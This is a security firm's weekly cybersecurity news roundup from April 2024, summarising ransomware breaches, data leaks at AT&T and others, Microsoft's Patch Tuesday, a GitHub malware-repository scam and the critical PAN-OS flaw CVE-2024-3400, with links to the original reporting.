News

Blog

Friday, April 12th, 2024

Cybersecurity Week in Review (12/04/24)


GHC-SCW: Ransomware gang stole health data of 533,000 people

Non-profit healthcare service provider Group Health Cooperative of South Central Wisconsin (GHC-SCW) has disclosed that a ransomware gang breached its network in January and stole documents containing the personal and medical information of over 500,000 individuals.
However, the attackers couldn’t encrypt the compromised devices, which allowed GHC-SCW to secure its systems with the help of external cyber incident response experts and bring them back online after they were isolated to contain the breach.
“On January 25th, 2024, during the early hours of the morning, GHC-SCW detected unauthorized entry into their network. As a response, the Information Technology (IT) Department intentionally isolated and fortified the network, resulting in temporary unavailability of several systems,” the healthcare organization announced in a press release issued on Tuesday.

Source – https://www.bleepingcomputer.com/news/security/ghc-scw-ransomware-gang-stole-health-data-of-533-000-people/

Google Chrome Adds V8 Sandbox – A New Defense Against Browser Attacks

Google has announced support for what’s called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues.
The sandbox, according to V8 security technical lead Samuel Groß, aims to prevent “memory corruption in V8 from spreading within the host process.”
The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that’s designed to mitigate common V8 vulnerabilities.
The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process’ virtual address space (“the sandbox”) and isolating it from the rest of the process.

Source – https://thehackernews.com/2024/04/google-chrome-adds-v8-sandbox-new.html

340,000 Social Security numbers stolen from US consulting firm

The breach was disclosed on Maine’s government website where data breach notifications affecting residents of the state have to be posted.
GMA filed a notice in February when it first discovered the breach but has only now said that the hackers have illicitly obtained hundreds of thousands of Social Security numbers of their victims.
The firm, which provides economic and litigation services to companies and US government agencies, including the Department of Justice (DOJ), did not specify the type of a cyberattack but said it “promptly took steps to mitigate the incident” in its data breach notice sent by mail to affected victims.
GMA said, ‘We consulted third-party cybersecurity experts to aid in managing the situation, and we informed law enforcement and the Department of Justice. It is probable that your personal and Medicare data was impacted by this event.'”

Source – https://cybernews.com/news/social-security-numbers-data-breach-gma/

Microsoft April 2024 Patch Tuesday fixes 150 security flaws, 67 RCEs

Today is Microsoft’s April 2024 Patch Tuesday, which includes security updates for 150 flaws and sixty-seven remote code execution bugs.
Only three critical vulnerabilities were fixed as part of today’s Patch Tuesday, but there are over sixty-seven remote code execution bugs. More than half of the RCE flaws are found within Microsoft SQL drivers, likely sharing a common flaw.
There were also fixes for twenty-six Secure Boot bypasses released this month, including two from Lenovo.


The number of bugs in each vulnerability category is listed below:
31 Elevation of Privilege Vulnerabilities
29 Security Feature Bypass Vulnerabilities
67 Remote Code Execution Vulnerabilities
13 Information Disclosure Vulnerabilities
7 Denial of Service Vulnerabilities
3 Spoofing Vulnerabilities

Source – https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2024-patch-tuesday-fixes-150-security-flaws-67-rces/

Canadian online vehicle dealer hit by cyberattack

The online vehicle dealer headquartered in Toronto, Canada, said that an unauthorized party had accessed specific areas of the legacy ABS Auto Auctions infrastructure.
The company took steps to secure the system – which was temporarily rendered inoperable – and launched an investigation into the incident.
The personal information involved includes:
• Dates of birth
• Social Security numbers
• Driver’s licenses
• Bank account numbers
• Bank routing numbers
EBlock has sent the breach notification letter “out of an abundance of caution” as it’s unsure whether its client’s personal information has been misused for fraudulent activity.

Source – https://thehackernews.com/2024/04/malicious-apps-caught-secretly-turning.html

HALO hacked, private data stolen

According to a report to the Maine Attorney General, the attack happened on November 22nd, 2023. The notice to affected clients on March 28th states that threat actors had accessed HALO’s computer systems and stolen files with private data.
The company mentioned in a statement that “its network’s computer systems were infiltrated by a sophisticated threat actor who utilized methods to avoid detection by their information security defenses.”
Threat actors got their hands on the data provided to HALO Human Resources for tax or benefits purposes, including name, date of birth, and Social Security number.
The report to the Maine Attorney General states that, in total, 7,305 people were affected by the breach.
HALO claims to be working with external cybersecurity experts to investigate the incident and to monitor the Dark Web for data being leaked. The company will also provide credit and identity protection services to affected individuals for 12 months free of charge.
HALO has more than 40 offices worldwide and employs over 1,500 individuals.
The company provides branded merchandise, uniform programs, and employee recognition and incentive solutions.

Source – https://cybernews.com/news/eblock-hit-by-cyberattack/

Beware: GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

Threat actors are now taking advantage of GitHub’s search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that’s designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.
The idea is to manipulate the search rankings in GitHub to bring threat actor-controlled repositories to the top when users filter and sort their results based on the most recent updates and increase the popularity via bogus stars added via fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.

Source – https://thehackernews.com/2024/04/beware-githubs-fake-popularity-scam.html

French football giant PSG says hackers targeted its ticketing system

According to the club’s letter to the fans, first published by Le Parisien, the incident was detected last week and shared with supporters on Monday.
“Madam, Sir, on April 3rd, the Information Systems Department of Paris Saint-Germain was challenged by unusual access attempts to the club’s ticketing system,” says the letter.
“Our teams detected a vulnerability, which they resolved in less than 24 hours. Additional security measures were immediately implemented.”
PSG says the club promptly informed the CNIL, the data protection authority for France, of the incident. Under the European Union’s data protection laws, the CNIL could fine PSG if the club was found to have been negligent in protecting customers’ data.

Source – https://cybernews.com/news/france-football-psg-cyberattack/

Epilepsy Foundation of Metro NY hit by ransomware attack

The Epilepsy Foundation of Metropolitan New York (EFMNY) is an organization that aims to promote awareness surrounding epilepsy while helping people locate treatment options, support, and resources.
The foundation observed that a cyberattack impacted a part of its network environment, leaving certain systems encrypted.
The attack “resulted in the unauthorized access and/or acquisition of certain files from within the network,” the breach notification letter reads.
The attack follows a typical double-extortion ransomware scenario: criminals first exfiltrate the data and then encrypt it on a victim’s machines, threatening to release the data if the demands aren’t fulfilled.
Cybernews has contacted the organization to see whether they have received a ransom demand and will update the article accordingly.

Source – https://cybernews.com/news/epilepsy-foundation-ransomware-attack/

Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks

Apple on Wednesday revised its documentation pertaining to its mercenary spyware threat notification system to mention that it alerts users when they may have been individually targeted by such attacks.
It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off “individually targeted attacks of such exceptional cost and complexity.”
Apple stated that “while mercenary spyware attacks are directed at a limited number of individuals, including journalists, activists, politicians, and diplomats, they persist worldwide.”
The update marks a change in wording that previously said these “threat notifications” are designed to inform and assist users who may have been targeted by state-sponsored attackers.

Source – https://thehackernews.com/2024/04/apple-expands-spyware-alert-system-to.html

AT&T now says data breach impacted 51 million customers

AT&T is notifying 51 million former and current customers, warning them of a data breach that exposed their personal information on a hacking forum. However, the company has still not disclosed how the data was obtained.
These notifications are related to the recent leak of a massive amount of AT&T customer data on the Breach hacking forums that was offered for sale for $1 million in 2021.
When threat actor ShinyHunters first listed the AT&T data for sale in 2021, the company told BleepingComputer that the collection did not belong to them and that their systems had not been breached.
Last month, when another threat actor known as ‘MajorNelson’ leaked the entire dataset on the hacking forum, AT&T once again told BleepingComputer that the data did not originate from them and their systems were not breached.

Source – https://www.bleepingcomputer.com/news/security/att-now-says-data-breach-impacted-51-million-customers/

Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack

Palo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild.

Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.

“A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall,” the company said in an advisory published today.

The flaw impacts the following versions of PAN-OS, with fixes expected to be released on April 14, 2024 –

PAN-OS < 11.1.2-h3
PAN-OS < 11.0.4-h1
PAN-OS < 10.2.9-h1

Source – https://thehackernews.com/2024/04/zero-day-alert-critical-palo-alto.html

Critical OS Command Injection in GlobalProtect Gateway

Threat Reports are reports created by Smarttech247 based on high and critical severity vulnerabilities that may have a high potential to be exploited in the wild i.e. vulnerabilities that are present in most used products by companies and do not have an auto-update option or they are usually not automatically updated in case that could lead to some service disruption. This report is usually created as soon as the vulnerability is released, therefore we strongly recommend that the information is reviewed, tests are performed and patches are applied before the first proof-ofconcept is released.
Even though certain vulnerabilities may not have an active exploit in the wild at the time that we report on them, we take into consideration the wider risk and the impact it could have on systems, should an exploit like that be available after a while. Our duty is to report them on time and we recommend enterprises that, in order to keep critical business systems protected, they should consider, on average, ten working days to check whether or not the new vulnerability affects them, and if so, to implement actions in order to remove the risk.


Overview
A critical vulnerability, CVE-2024-3400, has been identified in Palo Alto Networks PAN-OS software, specifically affecting versions 10.2, 11.0, and 11.1 with specific GlobalProtect gateway and device telemetry configurations. This flaw could allow an unauthenticated attacker to execute arbitrary code with root privileges on affected firewalls.

Full Report – https://resource.smarttech247.com/hubfs/2024_Reports/Critical_OS_Command_Injection_in_GlobalProtect_Gateway.pdf


Smarttech247

Contact Us

The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.

    Copyright Smarttech247 - 2021